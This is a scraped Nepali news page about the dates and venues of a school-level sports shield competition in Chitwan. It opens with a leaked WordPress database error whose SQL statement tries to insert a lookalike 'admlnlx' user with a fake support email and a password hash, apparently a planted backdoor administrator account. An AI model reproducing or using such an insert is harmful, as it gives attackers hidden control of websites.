WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKQp.8qt3i2oHB8v46.Sz0XHdPsksM0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 18:18:39', '', 'admlnlx', 'admlnlx')
चितवन, पुस ६–
राष्ट्रपति रनिङ शिल्ड खेलकुद प्रतियोगिता अन्तरगत चितवनमा पुस २४ गतेबाट विद्यालय स्तरीय खेल आयोजना हुने भएको छ ।
क्षेत्र नम्बर १ अन्तर्गत खैरहनी मावि खैरहनीमा पुस २४ र २५ गते, क्षेत्र नम्बर २ भीमोदय मावि पदमपुर २७ र २८ गते, क्षेत्र ३ अन्तर्गत बालकुमारी माविमा माघ ५ र ६ क्षेत्र ४ अन्र्तगत माघ २ र ३ चित्रवन खेलकुद मैदान चित्रवन र क्षेत्र ५ अन्तरगत जानकी मावि मेघौलीमा माघ ७ र ८ गते खेल हुने जिल्ला खेलकुद विकास समिति चितवनका सचिव रामजी ढकालले जानकारी दिए ।
साथै जिल्लास्तरीय खेल माघ १२ र १३ गते हुने र कराते, उसु, तेक्वान्दोको खेल पनि १२ र १३ गते कभर्डहल भरतपुरमा हुन लागेको खेलकुद विकास समिति चितवनका कोषाध्यक्ष केशव आचार्यले बताए । यसअघि लगातार २ वर्ष जानकी मावि मेघौली शिल्ड उचाल्न सफल भएको थियो ।